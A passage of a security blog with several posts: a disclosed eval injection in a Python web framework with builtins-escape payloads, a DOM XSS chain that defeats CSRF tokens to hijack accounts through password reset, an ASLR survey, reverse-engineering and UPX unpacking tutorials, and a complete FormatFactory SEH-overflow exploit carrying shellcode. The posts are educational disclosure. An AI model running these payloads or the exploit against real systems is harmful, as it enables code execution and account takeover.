Remote Code Execution in framework

Several months ago I happened to be looking at‘s source code when I found an old-style (as in basic) remote code execution in the database module. Fortunately for most users of, the database module is pretty simple and most installations leverage other external python modules for db operations instead. I meant to wait until it was fixed, and then I simply forgot to come back and add an entry about it. A first attempt at fixing the issue was done in April and the final patch was committed in May.

The issue

The db module tries to provide a way for developers to do «ruby style» variable interpolation in SQL queries, which is a cool feature but unfortunately too powerful in the way it was implemented. The vulnerable function is called «reparam» and it is called to do the interpolation we were talking about. Here’s its original code:

def reparam(string_, dictionary):
    Takes a string and a dictionary and interpolates the string
    using values from the dictionary. Returns an `SQLQuery` for the result.

        >>> reparam("s = $s", dict(s=True))
        <sql: "s = 't'">
        >>> reparam("s IN $s", dict(s=[1, 2]))
        <sql: 's IN (1, 2)'>
    dictionary = dictionary.copy() # eval mucks with it
    vals = []
    result = []
    for live, chunk in _interpolate(string_):
        if live:
            v = eval(chunk, dictionary)
    return SQLQuery.join(result, '')

The docstring is pretty self-explanatory, as it is the vulnerability. The entry points to reparam() are functions _where(), query(), and gen_clause(). Since there’s no control in any of these functions on what the user is sending as part of the query, remote code execution is possible with a call like the one below, in which the param after /q/ is part of the where clause of a simple query:$__import__(‘os’).system(‘pwd’)

It’s also possible to test this directly in the interpreter, which is easier:

>>> import web
>>> web.reparam("$__import__('os').getcwd()", {})
<sql: "'/Users/adrian'">

A first attempt at fixing it

After I emailed the developers describing the issue they committed a new version in a handful of days. I have to say that I received a reply to my email on the same day acknowledging the issue and thanking me for bringing it up; my deepest respect to’s developers.

Their original approach was to remove python built-ins from eval(). This removes things link «__import__» from the scope of the function, which you’d need to call the ‘os’ module. It strips the scope to the bare bones, in theory limiting any attempt at running code. This is what happens when you try the above exploit in the new version:

>>> import web
>>> web.reparam("$__import__('os').getcwd()", {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "web/", line 305, in reparam
    v = eval(chunk, dictionary)
  File "<string>", line 1, in <module>
NameError: name '__import__' is not defined

No surprises there. However, securing eval is not an easy task. In fact, I’m not completely sure whether it is possible to eval user input in a completely safe fashion. Even if you remove the whole builtins, due to python’s idiosyncrasy it is possible to get them back. Long time ago I read this really nice article that has been useful many times when dealing with python. Based on that, this is the POC I sent back:

>>> web.reparam("${(lambda getthem=([x for x in ().__class__.__base__.__subclasses__() if x.__name__=='catch_warnings'][0]()._module.__builtins__):getthem['__import__']('os').getcwd())()}",{})
<sql: "'/Users/adrian/Desktop/webpy/webpy'">

And we’re back in business. Wait, ok, but what’s happening there? Well, it is simple. Essentially I’m using the subclasses of python’s «tuple» until I locate one called «catch_warnings».

().__class__.__base__.__subclasses__() # takes tuple, goes to the parent class, and then traverses the subclasses

Why this one in particular? Just because it happens to have the original built-ins in scope, which we’ll then use to retrieve «__import__» and access the «os» module again. Nice, huh?

The final fix

In the end,’s developers decided to implement a safer solution, albeit with limited functionality. If I remember correctly the old behaviour can still be enabled if desired, but the default should be the safest approach. This solution makes use of the AST module to create a custom parser and evaluator, calling safe_eval() instead of eval(). As far as I can tell, this solves the vulnerability.

To sum up, if you have an old version of running and you’re using the built-in database module, you should be upgrading right now.

Take care.

Tagged with: , , , ,
Publicado en hacking, Programming, web hacking

How Effective is ASLR on Linux Systems?

Address Space Layout Randomization (ASLR) is an exploit mitigation technique implemented in the majority of modern operating systems. In a nutshell, the idea behind ASLR is randomizing the process’ memory space in order to prevent the attacker from finding the addresses of functions or gadgets (s)he might require to successfully complete the exploit. Since an in depth explanation of ASLR is beyond the scope of this brief blog post, if you feel like reading more about ASLR, I suggest you start with these (I,II).

The Good

Linux introduced ASLR with kernel 2.6.12 back in 2005, followed by Microsoft, who did the same thing with Vista in 2007. While Linux’s ASLR is forced on every executable, Microsoft’s implementation requires the binary to be linked with ASLR support. The aforementioned randomization affects both shared libraries and executables in order to provide a fully randomized process address space. Starting 2013, one would like to think that this mechanism is mature as well as it is widely adopted, thus increasing the overall security of the operating systems (am I being too naive?).

Linux ASLR can be configured through /proc/sys/kernel/randomize_va_space. The following values are supported:

  • 0 – No randomization. Everything is static.
  • 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized.
  • 2 – Full randomization. In addition to elements listed in the previous point, memory managed through brk() is also randomized.

I don’t mean to talk about the math involved in ASLR, but a quick word is hopefully not completely uncalled for. Effectiveness of ASLR is limited by the amount of entropy assigned or available. Theoretically, a 32 bit system provides less entropy to be used with ASLR than a 64 bit one. However, other constraints apply to the amount of entropy, such as those related to memory layout. For example, in order to allow the stack to continue growing from higher memory down towards the heap, the most significant bits are usually not randomized. In some scenarios, this limits the entropy of mmap() in a 32 bit system to only 16 bits. PAX patch is available to increase this amount to 24 bits.

The Bad

Leaving the math elements aside, it’s obvious that for ASLR to be effective, all segments of a process’ memory space must be randomized. The existence of a single area in memory not randomized completely defeats the purpose of ASLR. This is so because the attacker could use that single area not randomized to locate valuable gadgets in order to build a successful exploit. This has been a recurring problem with Windows implementations, since third party software (and often Windows’ software) contained some DLLs not participating in ASLR, it was easy to build exploits leveraging those libraries. Linux kernels prior to 2.6.22 had a similar problem where VDSO ( was always located at a fixed location.

On the other hand, current Linux has its own set of problems. In spite of ASLR being forced on every process, not every memory area is randomized for all executables. The code segment (or text segment; .text) of the main binary is located at random locations only if the executable has been compiled as a Position Independent Executable (PIE). A position independent executable is compiled in such a way that can be located anywhere in memory and still execute properly without modification. This is achieved through the use of PC relative addresses instead of absolute addresses. All shared objects (.so, libraries) are compiled as PIE as it’s mandatory for them to work, thus they’re always at random memory addresses when ASLR is enabled.

Based on the above paragraph, we can assume that Linux executables not compiled as PIE are not effectively protected by ASLR, even though it might be set to 2 (Full Randomization). The attacker could leverage the .text segment, and other areas located within the main executable, such as GOT/PLT to build a successful exploit against a non-PIE executable on a system with ASLR enabled. As a result, any non-PIE executable leaves the door open to return-2-plt/GOT dereferencing and ROP attacks.

The following code is used to demonstrate that main executable is not randomized despite ASLR being enabled unless it’s compiled as PIE.

#include <stdlib.h>
#include <stdio.h>

void* getEIP () {
return __builtin_return_address(0)-0x5;

int main(int argc, char** argv){
printf("EBP located at: %p\n",getEIP());
return 0;

Execution of the above code as non-PIE is displayed on the image below.

.text not randomized on Non-PIE executable

.text not randomized on Non-PIE executable

As can be seen, libraries are located at random addresses each time, meanwhile the .text section remains static. When compiled as a PIE, the following image shows how the address of the .text section is also randomized, and therefore unguessable for the attacker.

.text is random in PIE executables

.text is random in PIE executables

The Ugly

So far so good. Non-PIE executables do not benefit from ASLR protection, so? Linux binaries are surely compiled as PIE to make the most of the available exploit mitigations, or do they? According to some studies, the Linux flavours most used as web server are CentOS, Ubuntu Server and Debian (although I guess RedHat enterprise has some nice share as well). Based on that, I’ve compiled some statistics about the number of PIEs present in the above Linux distributions. The systems studied are:

  • Ubuntu Server 12.10 x86_64 + apache2 + mysql + php5 +sshd
  • Debian 6 x86_64 + web server + mysql + php5 + sshd
  • CentOS 6.3 x86_64 + apache2 + mysql + php5 + sshd

All of them installed with the standard options. The following results were compiled using Checksec, a nicely done script that checks for the presence of common security mechanisms such as ASLR, NX, Canaries, RELRO, etc. You can obtain Checksec here. These are the numbers:

Distro Num Binaries PIE Enabled Not PIE
Ubuntu 12.10 646 111 (17.18%) 535
Debian 6 592 61 (10.30%) 531
CentOS 6.3 1340 217 (16.19%) 1123

Surprisingly enough, the use of PIE is not widely embraced by the above Linux versions. However, network daemons are usually compiled as PIE, alleviating the problem and reducing the attack surface. Whether the reason not to enable PIE is performance (PIE binaries require an extra indirection) or not, the security implications greatly compensate for that. Quick and dirty math shows that between 82.82% and 89.7% of binaries are not effectively protected by ASLR in Linux systems.

In the same way, other protections such as stack canaries and RELRO were taken into account during this exercise and the results are both uneven and shocking. However, in order to obtain a truthful vision of the state of those security mechanisms, further work is required. For example, GCC would only include stack canaries in functions that match specific criteria; in other words, functions that GCC considers a likely target for buffer overflows. The result being that the lack of canaries in some binaries does not necessarily mean the executable is missing some mitigation mechanism, it may as well not be needed at all.

Well, so much for a Sunday evening. Any questions or corrections, use the comments!

Take care.

Tagged with: , , ,
Publicado en exploiting, hacking, Linux

XSS killed the anti-CSRF star

This entry hopes to be a quick consideration about how one attack vector can at times dismantle the security of a different area of the application that was otherwise deemed secure. Truth is, security threats many times work like this, one thing builds upon another until, in the end, the attacker is able to score. In this case, I’ll show a real life example of how a DOM XSS flaw can be the only leverage an attacker needs to bypass a random token based CSRF protection. As a cherry, we’ll see that this effectively lead to account theft.

There’s been many a time that developers don’t fully understand that a «small» flaw can compromise the whole application if used with wit. In this case, it wasn’t even necessary to string many flaws. It sufficed with one used in the right spot to compromise the application.

The story goes as follows. We have a rather secure web application, with no major session management issues, and a settings page that looked something like this.

CSRF protected settings page

CSRF protected settings page

As shown in the image above, the application’s settings page contains an anti CSRF token that is random per request, and therefore it’s not vulnerable to CSRF attacks, or is it? The only flaw this application had was a DOM XSS present in every page -settings inclusive- that was considered «not critical» by the developers. But as is well understood by web pentesters, XSS flaws enable attackers to bypass CSRF token protections. The simple idea beneath is that the attacker can use the injected script to read the DOM, obtain the CSRF token and use it to make the right request to the server. Let’s take a closer look at this DOM XSS.

For every section of the application, a message indicates where within the application the user is. This has been implemented using a small JavaScript snippet that takes the URL and prints it on the screen. The code used was like this:

function printArea(){
var x=document.getElementById("area");
var u = window.location.href.toString();
area = u.substring(u.lastIndexOf("//")+2);
x.innerHTML = "You are in " + area +"<br \>";
The vulnerability is obvious, since there’s no encoding of the URL (window.location.href) and it can be manipulated by an attacker. A simple payload like #<img src=1 onerror=alert(42)> appended to the URL triggers the flaw as can be seen in the screenshot below.
Triggering the DOM XSS

Triggering the DOM XSS

Nothing surprising here. Pretty easy, straight forward DOM XSS. How can the attacker use this to launch a CSRF attack then? Simple, the attacker would add into the URL JavaScript code that reads the CSRF token from the DOM, builds a POST request (the web doesn’t work with GET) and sends it. The server would have no way to tell the legitimate user’s request from this one. To get the token, the following line can be used:


Reading the anti CSRF token

Reading the anti CSRF token

All the attacker needs to do now is put together a small piece of code to use that token to submit a request. The following code worked for the above vulnerability:

var http=new XMLHttpRequest();
params=' Fake Street&csrf_token='+token+'&submit=';
http.setRequestHeader('Connection', 'close');
That script (can be simplified), URL encoded, can be used to attack a legitimate user and force him into submitting the form and thus modifying email/address/phone to one of the attackers choosing. Nothing too exciting though, until you put all the pieces together. The developer classified this as low risk, since in his opinion editing those settings won’t take the attacker anywhere. However, he failed to see, that the expected behaviour of his application would allow the attacker to access other people’s accounts. How so? Easy, the application has a «Reset Password» functionality with no vulnerabilities at all, that looked like this.
Email the user a new password

Email the user a new password

If the user cannot remember his password, all he/she has to do is enter his username in the text field (and captcha), and he will be sent an email with a new temporary password to the email account specified on his settings page. The attack vector should be crystal clear now:

  1. Attacker lures victim to click on a link with the above XSS payload in the URL
    1. The payload submits a request to the page bypassing the CSRF protection, changing the account email to the attacker’s one
  2. If need be, the payload is tailored to also send the username to the attacker (i.e. making a GET request to his evil server)
  3. The attacker visits the «Reset Password» page, introduces the victims username.
  4. The attacker receives a new password for the victims account, and effectively steals it.

If the settings page were using another anti CSRF technique, like Capthas or asking the user for credentials would still have been possible, although a little bit more tricky.

This is nothing new or technically complex, but I felt like pointing it out since I find many people fails to connect the dots to achieve their goals with the vulnerabilities they find. At the same time, many developers aren’t aware that a XSS can turn into a session management issue.

Tagged with: , , ,
Publicado en web hacking

Calling Conventions Hunting

When trying to understand a binary, it’s key to be able to identify functions, and with them, their parameters and local variables. This will help the reverser figuring out APIs, data structures, etc. In short, gaining a deep understanding of the software. When dealing with functions, it’s essential to be able to identify the calling convention in use, as many times that will allow the reverser to perform educated guesses on the arguments and local variables used by the function. I’ll try to describe here a couple of points that may aid in identifying the calling convention of any given function and the number and ordering of its parameters.

Calling Conventions

A calling convention defines how functions are called in a program. They influence how data (arguments/variables) is laid on the stack when the function call takes place. A comprehensive definition of calling conventions is beyond the scope of this blog, nonetheless the most common ones are briefly described below.


Description: Standard C/C++ calling convention. Allows functions to receive a dynamic number of parameters.

Cleans the stack: The caller is responsible for restoring the stack after making a function call.

Arguments passed: On the stack. Arguments are received in reverse order (i.e. from right to left). This is because the first argument is pushed onto the stack first, and the last is pushed last.

void _cdecl fun();


Description: Slightly better performance calling convention.

Cleans the stack: The callee is responsible for restoring the stack before returning.

Arguments passed: First two arguments are passed in registers (ECX and EDX). The rest are passed through the stack.

void __fastcall fun();


Description: Very common in Windows (used by most APIs).

Cleans the stack: The callee is responsible for cleaning up the stack before returning. Usually by means of a RETN #N instruction.

Arguments passed: On the stack. Arguments received from left to right (opposite to cdecl). First argument is pushed last.

void __stdcall fun();


Description: Used when C++ method with a static number of parameters is called. Specially thought to improve performance of OO languages (saves EDX for the this pointer with VC++. GCC pushes the this pointer onto the stack last). When a dynamic number of parameters is required, compilers usually fall back to cdecl and pass the this pointer as the first parameter on the stack.

Cleans the stack: In GCC, caller cleans the stack. In Microsoft VC++ the callee is responsible for cleaning up.

Arguments passed: From right to left (as cdecl). First argument is pushed first, and last argument is pushed last.

void __thiscall fun();

Let the small table below serve as a quick reminder.

Quick calling convention reference

Quick calling convention reference

Figuring it out

To determine the calling convention for a given function we have to look at the function’s prologue and epilogue. They’ll provide information to narrow down the options and will help discovering the number of parameters and arguments of the function. The first thing is to find out who is building up and tearing down the stack.

If the caller is responsible of cleaning up the stack we’re more than likely looking at a cdecl function. Certainly, it could also be a GCC thiscall, in which case there would be one extra argument (the this pointer) pushed onto the stack. The latter is less common, and to tell apart we’ll need to spot that pointer. In other words, if the function takes one or more parameters (usually references ebp+X,  with X>=8) and ends with a simple RET with no operands, the calling convention is most likely cdecl. See below example:

mov eax, dword ptr [ebp+8]
mov ecx, dword ptr [ebp+c]
mov eax, 1 # return value in eax
ret # no stack wind-up

If the callee is responsible for tearing down the stack, there are more options to start with. Our options at this stage would be VC++ thiscall, stdcall and fastcall. It gets complicated for functions with 0 or 1 parameter. However, a function with just 1 parameter may not require that we completely identify the calling convention, as there’s no doubt about the parameter ordering. The following tips will help you identify them on the rest of the cases.

If a valid pointer is loaded into ECX before calling a function, and the parameters are pushed onto the stack without using EDX, we’re looking at a VC++ thiscall. See example ASM below.

push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [ebp+c]
pop ebp
retn 8

If both ECX and EDX are used within the function without being initialized (meaning they are used as parameters and were loaded with valid data by the caller), we’re looking at a fastcall. See example ASM below

push ebp
mov ebp, esp
mov eax, dword ptr [ecx+c]
mov ebx, dword ptr [edx]
add eax, ebx
mov ebx, dword ptr [ebp+8]
pop ebp
retn 4

If all arguments are on the stack and the ending ret instruction has an argument whose value is at least four times the number of parameters for the function, we’re looking at a stdcall. In case the value is less than four, we might be talking about a fastcall with three or more arguments. See example ASM below.

push ebp
mov ebp, esp
mov eax, dword ptr [ebp+8]
mov ecx, dword ptr [ebp+c]
mov eax, 1 # return value in eax
ret 8 # no stack wind-up


For those calling conventions where the callee is responsible for restoring the stack before returning, the argument passed to the ret instruction is very helpful to guess the number of arguments the function receives. Without any further observation, a simple instruction like the one below offers a lot of information.

retn 8

We can make an educated guess based on that retn. First, we know is not cdecl, since the function is unwinding the stack and not leaving that task to the caller. We also know that the number of arguments for the function is at least 2, since it unwinds 8 bytes from the stack, and can be up to 4 (if the calling convention were fastcall the first two would be in ECX and EDX). All this, of course, assuming 32 bits parameters and a 32 bits architecture.


In order to decipher undocumented APIs, it’s key to identify the calling convention in use. It’s obvious at this point that a different calling convention would change the signature of a function from fun(p1,p2,p3) to fun(p3,p2,p1), therefore the need to identify it clearly. I hope it’s more than evident that figuring out the calling convention, as well as the number of parameters a function takes, it’s the first step to try and understand it’s inner workings.

As always, if there’s anything to add, ask or correct, don’t hesitate to comment!

Take care!

Tagged with: , ,
Publicado en Programming, Reverse

SANS HolidayHack Write Up

During this Christmas break, although I went back to Spain to stay with family and friends I still was able to get some time to look at the SANS HolidayHack 2012 CTF. I must say it has been great fun, the story was very creative with the Miser brother’s and Santa and all. I got stuck at some of the levels but was finally able to solve them all. I didn’t really want to steal much more time from family so my write-up might be a little bit rough. Nonetheless, I’m uploading it now that the CTF has finished and for those interested it can be found here.

Miser brothers

Miser brothers

Prizes haven’t been given yet, one to the best technical answer, one to the most original answer and one randomly assigned between the participants. Let’s see if I get lucky.

Tagged with: , , ,
Publicado en CTF, hacking, wargame

A very light introduction to packers

It’s been a long time since I’ve been thinking of writing some posts about packers/crypters/protectors. I’m not sure how many I’ll write; it will probably depend on the interest of the audience. What I do know, is that I’ll try and follow the blog’s philosophy so we’ll go bottom up, explaining the basic concepts or pointing out to the best references when I deem it appropriate.

Packers, Crypters, Protectors

The first time one tries to look into this topic, one comes across these different names for what at first glance seem to be pretty much the same. These terms are nowadays somewhat mixed, but I think the following definition won’t harm and might shed some light for the inexperienced:

  • A Packer‘s main goal is to reduce the executable size using compression algorithms. (e.g. UPX)
  • A Crypter‘s main goal is to encrypt the executable, hindering the disassembly process. (e.g. EasyCrypter)
  • A Protector‘s main goal is to make more difficult the task of debugging an executable using anti debugging techniques. (e.g. Yoda’s Protector)
  • An Hybrid combines two or more of the above characteristics (e.g. Crypter)

The categorization problem should be obvious now, since many existing tools combine more than one of the above attributes . The confusion as to why some people consider a pure packer to be a protection against reverse engineering may come from the fact that all of the above tools modify the Original Entry Point (OEP) of the executable and modify the Import Address Table (IAT) either compressing, encrypting or protecting it. For a better understanding of why this is a bother when reversing, it’s key to realize that one of the first steps when starting the reverse engineering process of a program is to locate the OEP as well as function calls and common API references. Since these tools compress or encrypt the executable code and the IAT, the reverse engineer cannot locate those APIs until the unpacking has taken place.


It should suffice to say that knowledge is always valuable, but for those of you wondering about the practicality of learning how to unpack a packed binary or how to create your own simple packer/crypter I’ll make a case. From a penetration tester perspective, knowing how to create your own packer/crypter may come in handy at situations where you need to bypass antivirus software in order to achieve code execution on your target. This has always been one of the main goals of crypters, and they’re heavily used by malware. From a reverse engineer perspective or binary auditor, you’ll come across many samples that are in fact packed. For the most common cases, there are automated tools that would be able to unpack the binary for you. Nevertheless, for new or unknown packers you’ll be on your own, and manually unpacking them will be the only way to go. If you’re a developer, you may want to know more about protectors/crypters in order to prevent unwanted eyes to pry on your application; many commercial applications make use of these kind of tools to keep the crackers at bay.

Introductory Example (Unpacking UPX)

Before giving a brief overview on theoretical concepts, I think I could show a manual (sort of) unpacking of the very well known UPX packer. The program we’re using for this example is Windows’ notepad.exe. First, we’ve downloaded UPX (from here) ,and we’ve packed notepad.exe

C:\Documents and Settings\adrian\Desktop\Unpacking\UPX\upx308w>upx.exe -o ..\notepad_UPX.exe ..\notepad.exe

That should have produced a file called notepad_UPX.exe which we’ll use for the demonstration. It might worth our while to stop now and try to identify any obvious differences between the original and the packed binaries.

Size difference is evident

Size difference is evident

Looks like UPX did a good job, it reduced the notepad.exe size from 69K to 48K by means of compression. Now let’s look at some PE tools to spot some other differences. First we’ll run RDG Packer Detector (download here) on both binaries, and the result is below:


Info on original notepad.exe

Info on packed notepad.exe

Info on packed notepad.exe

As we can see RDG says that original notepad.exe has been developed with Microsoft Visual C++ 7.0 and that the packed version has been packed with UPX. This was the expected result, since UPX is a very notorious packer and it’s been around for a long time. Another thing we can observe is the section table; we’ll use PEiD for that (download here).

Sections of original notepad.exe

Sections of original notepad.exe

OK, so we have three sections (.text, .data, .rsrc) and everything looks normal. Besides that, we can see the entry point located at offset 0x73d9.

Sections of packed notepad.exe

Sections of packed notepad.exe

That’s some differences there. We still have three sections, but the names have changed from .text and .data to UPX0 and UPX1. That’s no putting too much effort into concealing the packer, not that it was UPX’s goal anyway. The Entry Point has changed as well, now it points to the start of the unpacking routine (within UPx1). It’s also interesting the fact that the Raw Size of UPX0 is exactly 0 bytes, ain’t that weird? That causes two sections to have the same Raw Offset (0x400). These kind of things are a strong indicator that the executable has been through some kind of manipulation.

So now, let’s go and try to unpack the notepad.exe file that we’ve packed with UPX before. First we open the executable in Immunity Debugger to see a common sign of packed executables.

This binary has been packed!

This binary has been packed!

OK, so now the EIP should be sitting on the first instruction of our program, that as we know now, it’s the first instruction of the unpacking routine. Many packers, including UPX, start saving the processor state (registers) with a PUSHAD instruction. These are the looks of that:

Process just loaded into Debugger

Process just loaded into Debugger

We’re gonna do some cheating for the sake of the explanation here. We’ll take a look at the OEP within the debugger at the moment, right after loading the executable. After the unpacking takes place, we know (for we have the original file to compare) that the execution will jump to 0x0100739D (the OEP). But before the unpacking takes place, this is what lies at that address:

Contents of OEP before unpacking

Contents of OEP before unpacking

That’s certainly not good code, more like a bunch of zeroes. Now the little trick for the simple UPX. Since the packer starts saving the registers as we saw above, we can expect these registers to be restored right before the execution of the original notepad code starts. Thus, we’ll set a breakpoint on those registers to figure out when are they restored. Remember that our goal is to figure out the OEP. We’ll do as follows:

  1. Single step over the PUSHAD instruction (hit F7)
  2. Right click on ESP and click «Follow in Dump». You should be seeing the values of the registers in the dump window right now.

    Registers saved

    Registers saved

  3. Select the values of one of the saved registers in the dump window and set a hardware breakpoint, on access.
  4. Resume execution (hit F9).

If lucky, we should be stopping at the breakpoint we set in the previous step. A few instructions after where execution is stopped there should be a JMP, that will lead us to (oh surprise) the unpacked code of notepad.exe, and thus the OEP.

JMP to OEP is right there

JMP to OEP is right there

Single step from that JMP just once and you’ll land into the OEP at 0x0100739D (as we already knew). Don’t keep stepping for now. We’ll make use of OllyDumpEx (download here), a plugin for both Immunity Debugger and OllyDbg that dumps the process to disk. Now that the process is unpacked in memory, we can dump this to disk, creating an unpacked executable. That executable won’t run just like so, we’ll need to to a little bit of work on it, but for now, let’s dump it. The options you have to select on the OllyDumpEx window are displayed below.

Dump Options

Dump Options

Click on Dump and save it with the name of your choice (in my case notepad_UPX_dump.exe). At this point, if we try to run the dumped binary it will display an error message, in other words, it won’t run. As disappointing as that might be, it has a rational explanation, and that is because the IAT needs to be repaired. We’ll talk about the IAT and how to repair it manually coming up in future post entries. For now, it suffices to say that our dumped binary has no clue where to obtain the addresses of the API functions it requires to execute properly. Many times, there is no need to repair the IAT manually and we can rely on ImpREC tool (download here) to do that for us. What we’re doing now to fix the IAT is:

  1. Run the packed version of notepad (notepad_UPX.exe) and leave it there.
  2. Run ImportREC
  3. In the dropdown menu, locate your notepad_UPX.exe process.
  4. Then modify the OEP box at the bottom to point to the OEP we’ve previously found, without the base address (i.e. just the offset). In this case 0000739D.
  5. Click on «Get Imports»

The ImpREC window should look like the picture below.

Import Reconstructor found IAT for notepad_UPX.exe

Import Reconstructor found IAT for notepad_UPX.exe

Now hit on «Fix Dump», select the previously dumped file (notepad_UPX_dump.exe) and click OK. That’s it, ImpREC should have fixed the IAT of our process and created a new file called «notepad_UPX_dump_.exe» (note trailing underscore). You can try and run it now, if you followed all the steps, the notepad window should open as expected. Finally we have an unpacked version of notepad that we can now reverse engineer at will.

We’ve seen a little bit about packers and we’ve shown a quick and very easy example on how to unpack UPX to whet the appetite. There are many more things to do with this, there are many more topics to cover as it gets more challenging and interesting at once. Hopefully we’ll cover more of that in subsequent entries, till then If you have any questions, please leave a comment. Take care!

Tagged with: , , , , ,
Publicado en cracking, Reverse

FormatFactory 3.01 Stack Based Buffer Overflow (SafeSEH bypass)

Last week I saw this vulnerability disclosed in PacketStorm and I decided to create my own exploits; yeah, boredom is a powerful motivation. Original published exploit wouldn’t work for my system, maybe because it was designed for the German language. I thought it might be a good idea to explain the process since this exploit is simple enough.


Software: FileFormat v3.01 Stack Based Buffer Overflow

System: Windows XP SP3 Pro Spanish

Bypasses: SafeSEH


Format Factory is a multifunctional media converter for Windows. It’s free and offers a wide range of functionality. The application creates .ini files to store the user preferences for each type of conversion (e.g. if you decide your TIFF files will have a max width of 320, it stores that info in a .ini file). Those files are created under %USERPROFILE%/My Documents/FormatFactory/XXX/, being the XXX the name of a folder specific to the type of media file (PicCustom, AudioCustom…). The following is an example of a .ini file for TIFF format:


We can start playing along with these files, fuzzing the format is not complicated, and I might write another post on how to do it with Sulley later on. The vulnerability is triggered when the application processes long strings as the value of the Type key. From fuzzing (or manual increment of the size of the Type value) we can see that FileFormat starts crashing when the length of the string is 256 ‘A’. These are the looks of the registers and stack trace when the crash happens:

Crash with 256 As

Program crash with 256 A’s

Unfortunately we can’t see our A’s anywhere. At this point we could reverse engineer the vulnerable function and try to figure out why the crash is happening. Another way,that comes natural when fuzzing, is to increase the length of the payload and see how that affects the crash. In our case, after increasing the payload length to 8192 A’s we can see the program generating an exception, and when the SEH handler is called (once we pass the exception to the program), a segmentation fault happening when trying to execute 0x41414141.

Crash at 8192 A's controlling EIP

8192 A’s shows control of EIP when SEH is invoked

Now, that’s good news. Controlling EIP through SEH overwrite means that we can try our luck with this program. Next, we’ll take a look at the output of the command «!mona modules» within Immunity Debugger to see what modules are loaded and what protections are we facing. On my system, the output is shown below:

Mona modules output

Output of !mona modules

A quick glance shows that ASLR is disabled, as well as NX. However, all modules have been compiled with /SAFESEH flag, which means that we’ll have to bypass that inconvenience while developing our exploit. SafeSEH is an exploit mitigation technique which checks the address of the SEH to be executed against a list of handlers generated at compile time. If the address of the SEH to be executed doesn’t belong to the list, program is terminated. Nonetheless, SafeSEH doesn’t kick in for some types of addresses (i.e. the heap, or addresses not belonging to loaded modules). We’ll use that flaw to build a successful attack.

First things first, we need to figure out the exact position in our payload that’s effectively overwriting EIP. For that, we’ll take advantage of another of the invaluable commands:

!mona pc 8192

That command, based on metasploit’s pattern_create, generates a cyclic pattern of the specified length. We’ll copy that pattern into the .ini file. A portion of that pattern will be held in EIP at the time of the crash. In our case, EIP holds the value 0x41386941. With the aid of another command, we’ll find out the position at which we can gain control over EIP.

pattern offset

Pattern found at position 264

We have enough information to start putting together a simple python exploit for this vulnerability. Since we seem to have no room problems to accommodate our shellcode, we’ll use a simple metasploit generated one which will launch the infamous Windows calculator. To generate such a creative shellcode, we are going to use metasploit’s msfpayload, making sure we exclude the following bad chars: 0x00, 0x0a, 0x0d (null byte and line terminators).

msfpayload output

shellcode obtained through msfpayload

We can use that output directly into our exploit code. We still need to figure out a suitable address containing the desired «pop/pop/ret» sequence (or anything equivalent) that’s a classic when it comes down to SEH exploitation.To find the aforementioned address we’ll make use of one more time. Since all modules have been compiled with /SAFESEH flag, the execution of «!mona seh» or «!mona seh» won’t find any suitable address. However, the optional argument «-all» would instruct to search for pointers outside loaded modules, which would be an elegant solution to bypass SafeSEH. Below is the output of mona:

!mona seh -all

Pointers found outside loaded modules with !mona seh -all

OK, now we have all the information we need to build a successful exploit. The following python script would be a final version of such an exploit. It creates a .ini file containing the payload within one of Format Factory’s profile folders.

# Format Factory v3.0.1 stack buffer overflow exploit.
# Windows XP Pro SP3. Spanish
# Author: Adrian Bravo 24/11/2012

import struct

# msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x0a\x0d\x00"
sc= ("\xb8\xdf\x03\x36\x32\xda\xc8\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x33\x31\x47\x12\x03\x47\x12\x83\x18\x07\xd4\xc7\x5a" +
"\xe0\x91\x28\xa2\xf1\xc1\xa1\x47\xc0\xd3\xd6\x0c\x71\xe4" +
"\x9d\x40\x7a\x8f\xf0\x70\x09\xfd\xdc\x77\xba\x48\x3b\xb6" +
"\x3b\x7d\x83\x14\xff\x1f\x7f\x66\x2c\xc0\xbe\xa9\x21\x01" +
"\x86\xd7\xca\x53\x5f\x9c\x79\x44\xd4\xe0\x41\x65\x3a\x6f" +
"\xf9\x1d\x3f\xaf\x8e\x97\x3e\xff\x3f\xa3\x09\xe7\x34\xeb" +
"\xa9\x16\x98\xef\x96\x51\x95\xc4\x6d\x60\x7f\x15\x8d\x53" +
"\xbf\xfa\xb0\x5c\x32\x02\xf4\x5a\xad\x71\x0e\x99\x50\x82" +
"\xd5\xe0\x8e\x07\xc8\x42\x44\xbf\x28\x73\x89\x26\xba\x7f" +
"\x66\x2c\xe4\x63\x79\xe1\x9e\x9f\xf2\x04\x71\x16\x40\x23" +
"\x55\x73\x12\x4a\xcc\xd9\xf5\x73\x0e\x85\xaa\xd1\x44\x27" +
"\xbe\x60\x07\x2d\x41\xe0\x3d\x08\x41\xfa\x3d\x3a\x2a\xcb" +
"\xb6\xd5\x2d\xd4\x1c\x92\xc2\x9e\x3d\xb2\x4a\x47\xd4\x87" +
"\x16\x78\x02\xcb\x2e\xfb\xa7\xb3\xd4\xe3\xcd\xb6\x91\xa3" +
"\x3e\xca\x8a\x41\x41\x79\xaa\x43\x22\x1c\x38\x0f\x8b\xbb" +

path = "C:\Documents and Settings\adrian\Mis documentos\FormatFactory\PicCustom\profileExploit.ini"
buf = "A"*260 # Initial padding
buf += "\xeb\x06\x90\x90" # nseh: Jump over seh (6 bytes)
buf += struct.pack('<L',0x7ffc03ef) # SafeSEH bypass 0x7ffc03ef : pop ebx # pop eax # ret  |  {PAGE_READONLY} [None]
buf += sc
buf += "A"*(8192-264-8-len(sc))
file = open(path,"w")

The above payload follows the classic structure for an SEH exploit that I’m just explaining briefly. First we put some padding in order to reach the position where we know EIP will be overwritten minus 4 bytes. At that position, the next seh pointer, we place a short jmp of 6 bytes (\xeb\x06), that will jump over the seh pointer coming after, and land right into our shellcode. As that instruction is only two bytes long, we need to add a couple of nops (0x90), hence the need to jump over 6 bytes instead of 4 (2 nops + 4 bytes of the SEH pointer). Next, we add the address at which the «pop/pop/ret» sequence is located, and the shellcode immediately after. Last part of the file simply creates a file and writes the contents to it.

I’m calling it a day now. If you have any question, please feel free to ask in the comments. Take care!

Tagged with: , , , ,
Publicado en exploiting, seguridad, Windows

Achievement Unlocked: SANS GIAC GXPN

